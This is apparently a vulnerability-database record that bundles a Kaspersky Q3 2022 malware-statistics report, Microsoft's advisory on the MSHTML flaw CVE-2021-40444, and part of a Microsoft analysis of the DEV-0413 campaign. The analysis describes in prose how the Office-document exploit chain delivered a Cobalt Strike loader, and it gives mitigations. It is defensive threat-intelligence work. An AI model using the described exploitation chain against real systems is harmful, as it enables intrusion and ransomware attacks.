The attempts at exploiting network services and other software via vulnerabilities in the Log4j library ([CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), [CVE-2021-44832](<https://nvd.nist.gov/vuln/detail/CVE-2021-44832>), [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>), and [CVE-2021-45105](<https://nvd.nist.gov/vuln/detail/cve-2021-45105>)) also continued. Several vulnerabilities were found in the Microsoft Windows Network File System (NFS) driver. These are [CVE-2022-22028](<https://nvd.nist.gov/vuln/detail/CVE-2022-22028>), which can lead to leakage of confidential information, as well as [CVE-2022-22029](<https://nvd.nist.gov/vuln/detail/CVE-2022-22029>), [CVE-2022-22039](<https://nvd.nist.gov/vuln/detail/CVE-2022-22039>) and [CVE-2022-34715](<https://nvd.nist.gov/vuln/detail/CVE-2022-34715>), which a cybercriminal can use to remotely execute arbitrary code in the system \u2014 in kernel context \u2014 by using a specially crafted network packet. The TCP/IP stack was found to contain the critical vulnerability [CVE-2022-34718](<https://nvd.nist.gov/vuln/detail/CVE-2022-34718>), which in theory allows an attacker to remotely exploit a target system by taking advantage of errors in the IPv6 protocol handler. Finally, it is worth mentioning the [CVE-2022-34724](<https://nvd.nist.gov/vuln/detail/CVE-2022-34724>) vulnerability, which affects Windows DNS Server and can lead to denial of service if exploited.\n\nTwo vulnerabilities in Microsoft Exchange Server, [CVE-2022-41040](<https://nvd.nist.gov/vuln/detail/CVE-2022-41040>) and [CVE-2022-41082](<https://nvd.nist.gov/vuln/detail/CVE-2022-41082>), received considerable media coverage. They were collectively dubbed "ProxyNotShell" in reference to the ProxyShell vulnerabilities with a similar exploitation technique (they were closed earlier). 
Researchers discovered the ProxyNotShell exploits while investigating an APT attack: an authenticated user can use the loopholes to elevate their privileges and run arbitrary code on an MS Exchange server. As a result, the attacker can steal confidential data, encrypt critical files on the server to extort money from the victim, etc.\n\n### Vulnerability statistics\n\nIn Q3 2022, malicious Microsoft Office documents again accounted for the greatest number of detections \u2014 80% of the exploits we discovered, although the number decreased slightly compared to Q2. Most of these detections were triggered by exploits that targeted the following vulnerabilities:\n\n * [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), in the Equation Editor component, which allow corrupting the application memory when processing formulas, and subsequently running arbitrary code in the system;\n * [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>), which allows downloading and running malicious script files;\n * [CVE-2022-30190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30190>), also known as "Follina", which exploits a flaw in the Microsoft Windows Support Diagnostic Tool (MSDT) for running arbitrary programs in a vulnerable system even in Protected Mode or when macros are disabled;\n * [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>), which allows an attacker to deploy malicious code using a special ActiveX template due to inadequate input validation.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154631/09-en-malware-report-q3-2022-pc-stat.png>))_\n\nThese 
were followed by exploits that target browsers. Their share amounted to 6%, or 1% higher than in Q2. We will list the most serious vulnerabilities, all of them targeting Google Chrome:\n\n * [CVE-2022-2294](<https://nvd.nist.gov/vuln/detail/CVE-2022-2294>), in the WebRTC component, which leads to buffer overflow;\n * [CVE-2022-2624](<https://nvd.nist.gov/vuln/detail/CVE-2022-2624>), which exploits a memory overflow error in the PDF viewing component;\n * [CVE-2022-2295](<https://nvd.nist.gov/vuln/detail/CVE-2022-2295>), a Type Confusion error that allows an attacker to corrupt the browser process memory remotely and run arbitrary code in a sandbox;\n * [CVE-2022-3075](<https://nvd.nist.gov/vuln/detail/CVE-2022-3075>), an error linked to inadequate input validation in the Mojo interprocess communication component in Google Chromium-based browsers that allows escaping the sandbox and running arbitrary commands in the system.\n\nSince many modern browsers are based on Google Chromium, attackers can often take advantage of the shared vulnerabilities to attack the other browsers as long as they run on one engine.\n\nA series of vulnerabilities were identified in Microsoft Edge. 
Worth noting is [CVE-2022-33649](<https://nvd.nist.gov/vuln/detail/CVE-2022-33649>), which allows running an application in the system by circumventing the browser protections; [CVE-2022-33636](<https://nvd.nist.gov/vuln/detail/CVE-2022-33636>) and [CVE-2022-35796](<https://nvd.nist.gov/vuln/detail/CVE-2022-35796>), Race Condition vulnerabilities that ultimately allow a sandbox escape; and [CVE-2022-38012](<https://nvd.nist.gov/vuln/detail/CVE-2022-38012>), which exploits an application memory corruption error, with similar results.\n\nThe Mozilla Firefox browser was found to contain vulnerabilities associated with memory corruption, which allow running arbitrary code in the system: [CVE-2022-38476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38476>), a Race Condition vulnerability that leads to a subsequent Use-After-Free scenario, and the similar vulnerabilities [CVE-2022-38477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38477>) and [CVE-2022-38478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38478>), which exploit memory corruption. As you can see from our reports, browsers are an attractive target for cybercriminals, as these are widely used and allow attackers to infiltrate the system remotely and virtually unbeknownst to the user. That said, browser vulnerabilities are not simple to exploit, as attackers often have to use a chain of vulnerabilities to work around the protections of modern browsers.\n\nThe remaining positions in our rankings were distributed among Android (5%) and Java (4%) exploits. The fifth-highest number of exploits (3%) targeted Adobe Flash, a technology that is obsolete but remains in use. Rounding out the rankings with 2% were exploits spread through PDF documents.\n\n## Attacks on macOS\n\nThe third quarter of 2022 brought with it a significant number of interesting macOS malware discoveries. 
In particular, researchers found [Operation In(ter)ception](<https://www.sentinelone.com/blog/lazarus-operation-interception-targets-macos-users-dreaming-of-jobs-in-crypto/>), a campaign operated by North Korean Lazarus group, which targets macOS users looking for cryptocurrency jobs. The malware was disguised as documents containing summaries of positions at Coinbase and Crypto.com.\n\n[CloudMensis](<https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/>), a spy program written in Objective-C, used cloud storage services as C&C servers and [shared several characteristics](<https://twitter.com/ESETresearch/status/1575103839115804672>) with the RokRAT Windows malware operated by ScarCruft.\n\nThe creators of XCSSET [adapted](<https://www.sentinelone.com/blog/xcsset-malware-update-macos-threat-actors-prepare-for-life-without-python/>) their toolset to macOS Monterey and migrated from Python 2 to Python 3.\n\nIn Q3, cybercrooks also began to make use of open-source tools in their attacks. 
July saw the discovery of two campaigns that used a fake [VPN application](<https://www.sentinelone.com/blog/from-the-front-lines-new-macos-covid-malware-masquerades-as-apple-wears-face-of-apt/>) and fake [Salesforce updates](<https://twitter.com/ESETresearch/status/1547943014860894210>), both built on the Sliver framework.\n\nIn addition to this, researchers announced a new multi-platform [find](<https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/>): the LuckyMouse group (APT27 / Iron Tiger / Emissary Panda) attacked Windows, Linux, and macOS users with a malicious mod of the Chinese MiMi instant messaging application.\n\n### TOP 20 threats for macOS\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Amc.e | 14.77 \n2 | AdWare.OSX.Pirrit.ac | 10.45 \n3 | AdWare.OSX.Agent.ai | 9.40 \n4 | Monitor.OSX.HistGrabber.b | 7.15 \n5 | AdWare.OSX.Pirrit.j | 7.10 \n6 | AdWare.OSX.Bnodlero.at | 6.09 \n7 | AdWare.OSX.Bnodlero.ax | 5.95 \n8 | Trojan-Downloader.OSX.Shlayer.a | 5.71 \n9 | AdWare.OSX.Pirrit.ae | 5.27 \n10 | Trojan-Downloader.OSX.Agent.h | 3.87 \n11 | AdWare.OSX.Bnodlero.bg | 3.46 \n12 | AdWare.OSX.Pirrit.o | 3.32 \n13 | AdWare.OSX.Agent.u | 3.13 \n14 | AdWare.OSX.Agent.gen | 2.90 \n15 | AdWare.OSX.Pirrit.aa | 2.85 \n16 | Backdoor.OSX.Twenbc.e | 2.85 \n17 | AdWare.OSX.Ketin.h | 2.82 \n18 | AdWare.OSX.Pirrit.gen | 2.69 \n19 | Trojan-Downloader.OSX.Lador.a | 2.52 \n20 | Downloader.OSX.InstallCore.ak | 2.28 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nAs usual, our TOP 20 ranking of the biggest threats encountered by users of Kaspersky security solutions for macOS was dominated by adware. AdWare.OSX.Amc.e, touted as "Advanced Mac Cleaner," had taken the top place for a second quarter in a row. This application displays fake system issue messages, offering to buy the full version to fix those. 
Second and third places went to members of the AdWare.OSX.Pirrit and AdWare.OSX.Agent families.\n\n### Geography of threats for macOS\n\n**TOP 10 countries and territories by share of attacked users**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | France | 1.71 \n2 | Canada | 1.70 \n3 | Russia | 1.57 \n4 | India | 1.53 \n5 | United States | 1.52 \n6 | Spain | 1.48 \n7 | Australia | 1.36 \n8 | Italy | 1.35 \n9 | Mexico | 1.27 \n10 | United Kingdom | 1.24 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000). \n** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nFrance, with 1.71%, was again the most attacked country by number of users. Canada, with 1.70%, and Russia, with 1.57%, followed close behind. The most frequently encountered family in France and Canada was AdWare.OSX.Amc.e, and in Russia, it was AdWare.OSX.Pirrit.ac.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q3 2022, three-fourths of the devices that attacked Kaspersky honeypots used the Telnet protocol.\n\nTelnet | 75.92% \n---|--- \nSSH | 24.08% \n \n_Distribution of attacked services by number of unique IP addresses of attacking devices, Q3 2022_\n\nA majority of the attacks on Kaspersky honeypots in terms of sessions were controlled via Telnet as well.\n\nTelnet | 97.53% \n---|--- \nSSH | 2.47% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2022_\n\n**TOP 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 28.67 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 18.63 \n3 | Backdoor.Linux.Mirai.ba | 11.63 \n4 | Backdoor.Linux.Mirai.cw | 10.94 \n5 | Backdoor.Linux.Gafgyt.a | 3.69 \n6 | Backdoor.Linux.Mirai.ew | 3.49 \n7 | Trojan-Downloader.Shell.Agent.p | 2.56 \n8 | Backdoor.Linux.Gafgyt.bj | 1.63 \n9 | Backdoor.Linux.Mirai.et | 1.17 \n10 | 
Backdoor.Linux.Mirai.ek | 1.08 \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nDetailed IoT-threat statistics are published in the DDoS report for Q3 2022.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create these sites on purpose; they can infect hacked legitimate resources as well as web resources with user-created content, such as forums._\n\n### Countries and territories that serve as sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country or territory of the sources of internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q3 2022, Kaspersky solutions blocked 956,074,958 attacks launched from online resources across the globe. A total of 251,288,987 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources by country and territory, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154703/11-en-malware-report-q3-2022-pc-stat.png>))_\n\n### Countries and territories where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries and territories, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. 
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.\n\nNote that these rankings only include attacks by malicious objects that fall under the **_Malware_**_ class_; they do not include Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Taiwan | 19.65 \n2 | Belarus | 17.01 \n3 | Serbia | 15.05 \n4 | Russia | 14.12 \n5 | Algeria | 14.01 \n6 | Turkey | 13.82 \n7 | Tunisia | 13.31 \n8 | Bangladesh | 13.30 \n9 | Moldova | 13.22 \n10 | Palestine | 12.61 \n11 | Yemen | 12.58 \n12 | Ukraine | 12.25 \n13 | Libya | 12.23 \n14 | Sri Lanka | 11.97 \n15 | Kyrgyzstan | 11.69 \n16 | Estonia | 11.65 \n17 | Hong Kong | 11.52 \n18 | Nepal | 11.52 \n19 | Syria | 11.39 \n20 | Lithuania | 11.33 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware**-class attacks as a percentage of all unique users of Kaspersky products in the country._\n\nOn average during the quarter, 9.08% of internet users' computers worldwide were subjected to at least one **Malware**-class web attack.\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules of Kaspersky products. 
It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q3 2022, our File Anti-Virus detected **49,275,253** malicious and potentially unwanted objects.\n\n### Countries and territories where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThese rankings only include attacks by malicious programs that fall under the **Malware** class; they do not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Turkmenistan | 46.48 \n2 | Yemen | 45.12 \n3 | Afghanistan | 44.18 \n4 | Cuba | 40.48 \n5 | Tajikistan | 39.17 \n6 | Bangladesh | 37.06 \n7 | Uzbekistan | 37.00 \n8 | Ethiopia | 36.96 \n9 | South Sudan | 36.89 \n10 | Myanmar | 36.64 \n11 | Syria | 34.82 \n12 | Benin | 34.56 \n13 | Burundi | 33.91 \n14 | Tanzania | 33.05 \n15 | Rwanda | 33.03 \n16 | Chad | 33.01 \n17 | Venezuela | 32.79 \n18 | Cameroon | 32.30 \n19 | Sudan | 31.93 \n20 | Malawi | 31.88 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware**-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\nOn average worldwide, Malware-class local threats were registered on 14.74% of users' computers at least once during Q3. 
Russia scored 16.60% in this ranking.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-18T08:10:34", "type": "securelist", "title": "IT threat evolution in Q3 2022. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2018-0802", "CVE-2021-40444", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105", "CVE-2022-22022", "CVE-2022-22026", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22034", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22047", "CVE-2022-22049", "CVE-2022-2294", "CVE-2022-2295", "CVE-2022-2624", "CVE-2022-30190", "CVE-2022-30206", "CVE-2022-30220", "CVE-2022-30226", "CVE-2022-3075", "CVE-2022-33636", "CVE-2022-33649", "CVE-2022-34713", "CVE-2022-34715", "CVE-2022-34718", "CVE-2022-34724", "CVE-2022-35743", "CVE-2022-35750", "CVE-2022-35796", "CVE-2022-35803", "CVE-2022-37969", "CVE-2022-38012", "CVE-2022-38476", "CVE-2022-38477", "CVE-2022-38478", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-11-18T08:10:34", "id": "SECURELIST:C1F2E1B6711C8D84F3E78D203B3CE837", "href": 
"https://securelist.com/it-threat-evolution-in-q3-2022-non-mobile-statistics/107963/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2022-08-18T15:51:52", "description": "Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.\n\nAn attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nMicrosoft Defender Antivirus and Microsoft Defender for Endpoint both provide detection and protections for the known vulnerability. Customers should keep antimalware products up to date. Customers who utilize automatic updates do not need to take additional action. Enterprise customers who manage updates should select the detection build 1.349.22.0 or newer and deploy it across their environments. Microsoft Defender for Endpoint alerts will be displayed as: \u201cSuspicious Cpl File Execution\u201d.\n\nUpon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.\n\nPlease see the **Mitigations** and **Workaround** sections for important information about steps you can take to protect your system from this vulnerability.\n\n**UPDATE** September 14, 2021: Microsoft has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. 
We recommend that you install these updates immediately. Please see the FAQ for important information about which updates are applicable to your system.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-07T07:00:00", "type": "mscve", "title": "Microsoft MSHTML Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-08-16T07:00:00", "id": "MS:CVE-2021-40444", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mmpc": [{"lastseen": "2021-09-30T19:14:09", "description": "In August, Microsoft Threat Intelligence Center (MSTIC) identified a small number of attacks (less than 10) that attempted to exploit a remote code execution vulnerability in MSHTML using specially crafted Microsoft Office documents. 
These attacks used the vulnerability, tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>), as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders. These loaders communicated with an infrastructure that Microsoft associates with multiple cybercriminal campaigns, including human-operated ransomware.\n\nThe observed attack vector relies on a malicious ActiveX control that could be loaded by the browser rendering engine using a malicious Office document. Customers who enabled [attack surface reduction rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules?view=o365-worldwide>) to block Office from creating child processes are not impacted by the exploitation technique used in these attacks. While these attacks used a vulnerability to access entry point devices and run highly-privileged code, the secondary actions taken by the attackers still rely on stealing credentials and moving laterally to cause organization-wide impact. This illustrates the importance of investing in attack surface reduction, credential hygiene, and lateral movement mitigations. Customers are advised to apply the [security patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) for CVE-2021-40444 to fully mitigate this vulnerability.\n\nThis blog details our in-depth analysis of the attacks that used the CVE-2021-40444, provides detection details and investigation guidance for [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) customers, and lists mitigation steps for hardening networks against this and similar attacks. 
Our colleagues at [RiskIQ conducted their own analysis](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>) and coordinated with Microsoft in publishing this research.\n\n## Exploit delivery mechanism\n\nThe initial campaigns in August 2021 likely originated from emails impersonating contracts and legal agreements, where the documents themselves were hosted on file-sharing sites. The exploit document used an external oleObject relationship to embed exploitative JavaScript within MIME HTML remotely hosted content that results in (1) the download of a CAB file containing a DLL bearing an INF file extension, (2) decompression of that CAB file, and (3) execution of a function within that DLL. The DLL retrieves remotely hosted shellcode (in this instance, a custom Cobalt Strike Beacon loader) and loads it into _wabmig.exe_ (Microsoft address import tool.)\n\n\n\n_Figure 1. The original exploit vector: an externally targeted oleObject relationship definition bearing an MHTML handler prefix pointed at an HTML file hosted on infrastructure that has similar qualities to the Cobalt Strike Beacon infrastructure that the loader\u2019s payload communicates with._\n\nContent that is downloaded from an external source is tagged by the Windows operating system with a mark of the web, indicating it was downloaded from a potentially untrusted source. This invokes Protected Mode in Microsoft Office, requiring user interaction to disable it to run content such as macros. However, in this instance, when opened without a mark of the web present, the document\u2019s payload executed immediately without user interaction \u2013 indicating the abuse of a vulnerability.\n\n\n\n_Figure 2. 
Attack chain of DEV-0413 campaign that used CVE-2021-40444_\n\n## DEV-0413 observed exploiting CVE-2021-40444\n\nAs part of Microsoft\u2019s ongoing commitment to tracking both nation state and cybercriminal threat actors, we refer to the unidentified threat actor as a \u201cdevelopment group\u201d and utilize a threat actor naming structure with a prefix of \u201cDEV\u201d to indicate an emerging threat group or unique activity during the tracking and investigation phases before MSTIC reaches high confidence about the origin or identity of the actor behind an operation. MSTIC tracks a large cluster of cybercriminal activity involving Cobalt Strike infrastructure under the name DEV-0365.\n\nThe infrastructure we associate with DEV-0365 has several overlaps in behavior and unique identifying characteristics of Cobalt Strike infrastructure that suggest it was created or managed by a distinct set of operators. However, the follow-on activity from this infrastructure indicates multiple threat actors or clusters associated with human-operated ransomware attacks (including the deployment of Conti ransomware). One explanation is that DEV-0365 is involved in a form of command-and-control infrastructure as a service for cybercriminals.\n\nAdditionally, some of the infrastructure that hosted the oleObjects utilized in the August 2021 attacks abusing CVE-2021-40444 was also involved in the delivery of BazaLoader and Trickbot payloads -- activity that overlaps with a group Microsoft tracks as DEV-0193. 
DEV-0193 activities overlap with actions tracked by Mandiant as UNC1878.\n\nDue to the uncertainty surrounding the nature of the shared qualities of DEV-0365 infrastructure and the significant variation in malicious activity, MSTIC clustered the initial email campaign exploitation identified as CVE-2021-40444 activity separately, under DEV-0413.\n\nThe DEV-0413 campaign that used CVE-2021-40444 has been smaller and more targeted than other malware campaigns we have identified leveraging DEV-0365 infrastructure. We observed the earliest exploitation attempt of this campaign on August 18. The social engineering lure used in the campaign, initially highlighted by Mandiant, aligned with the business operations of targeted organizations, suggesting a degree of purposeful targeting. The campaign purported to seek a developer for a mobile application, with multiple application development organizations being targeted. In most instances, file-sharing services were abused to deliver the CVE-2021-40444-laden lure.\n\nIt is worth highlighting that while monitoring the DEV-0413 campaign, Microsoft identified active DEV-0413 infrastructure hosting CVE-2021-40444 content wherein basic security principles had not been applied. DEV-0413 did not limit the browser agents able to access the server to their malware implant or known targets, thereby permitting directory listing for their web server. In doing so, the attackers exposed their exploit to anyone who might have gained interest based on public social media discussion.\n\n\n\n_Figure 3. Content of the original DEV-0413 email lure seeking application developers_\n\nAt least one organization that was successfully compromised by DEV-0413 in their August campaign was previously compromised by a wave of similarly-themed malware that interacted with DEV-0365 infrastructure almost two months before the CVE-2021-40444 attack. 
It is currently not known whether the retargeting of this organization was intentional, but it reinforces the connection between DEV-0413 and DEV-0365 beyond sharing of infrastructure.\n\nIn a later wave of DEV-0413 activity on September 1, Microsoft identified a lure change from targeting application developers to a \u201csmall claims court\u201d legal threat.\n\n\n\n_Figure 4. Example of the \u201cSmall claims court\u201d lure utilized by DEV-0413_\n\n## Vulnerability usage timeline\n\nOn August 21, 2021, MSTIC observed a social media post by a Mandiant employee with experience tracking Cobalt Strike Beacon infrastructure. This post highlighted a Microsoft Word document (SHA-256: [3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf](<https://www.virustotal.com/gui/file/3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf>)) that had been uploaded to VirusTotal on August 19, 2021. The post focused on the document\u2019s custom Cobalt Strike Beacon loader and not on the delivery mechanism.\n\nMSTIC analyzed the sample and determined that an anomalous oleObject relationship in the document was targeted at an external malicious HTML resource with an MHTML handler and likely leading to abuse of an undisclosed vulnerability. MSTIC immediately engaged the Microsoft Security Response Center and work began on a mitigation and patch. During this process, MSTIC collaborated with the original finder at Mandiant to reduce the discussion of the issue publicly and avoid drawing threat actor attention to the issues until a patch was available. Mandiant partnered with MSTIC and did their own reverse engineering assessment and submitted their findings to MSRC.\n\nOn September 7, 2021, Microsoft released a security advisory for CVE-2021-40444 containing a partial workaround. 
As is routine in these instances, Microsoft was working to ensure that the detections described in the advisory would be in place and a patch would be available before public disclosure. During the same time, a third-party researcher reported a sample to Microsoft from the same campaign originally shared by Mandiant. This sample was publicly disclosed on September 8. We observed a rise in exploitation attempts within 24 hours.\n\n\n\n_Figure 5. Graphic showing original exploitation on August 18 and attempted exploitation increasing after public disclosure_\n\nMicrosoft continues to monitor the situation and work to deconflict testing from actual exploitation. Since the public disclosure, Microsoft has observed multiple threat actors, including ransomware-as-a-service affiliates, adopting publicly disclosed proof-of-concept code into their toolkits. We will continue to provide updates as we learn more.\n\n## Mitigating the attacks\n\nMicrosoft has confirmed that the following [attack surface reduction rule](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>) blocks activity associated with exploitation of CVE-2021-40444 at the time of publishing:\n\n * Block all Office applications from creating child processes\n\nApply the following mitigations to reduce the impact of this threat and follow-on actions taken by attackers.\n\n * Apply the security updates for [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). Comprehensive updates addressing the vulnerabilities used in this campaign are available through the [September 2021 security updates](<https://msrc.microsoft.com/update-guide/>).\n * Run the latest version of your operating systems and applications. 
Turn on automatic updates or deploy the latest security updates as soon as they become available.\n * Use a supported platform, such as Windows 10, to take advantage of regular security updates.\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown variants.\n * Turn on [tamper protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) in Microsoft Defender for Endpoint, to prevent malicious changes to security settings.\n * Run [EDR in block mode](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. 
EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.\n * Enable [investigation and remediation](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.\n * Use [device discovery](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>) to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.\n\n## Microsoft 365 Defender detection details\n\n**Antivirus**\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * [TrojanDownloader:O97M/Donoff.SA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:O97M/Donoff.SA&threatId=-2147225317>) \u2013 Detects the Word Doc files in the observed attacks\n * [TrojanDownloader:HTML/Donoff.SA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:HTML/Donoff.SA&threatId=-2147174205>) \u2013 Detects the remotely-loaded HTML\n * [Trojan:Win32/Agent.SA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Agent.SA&threatId=-2147178093>) \u2013 Detects the .inf(Dll)/CAB components in the observed attacks\n * 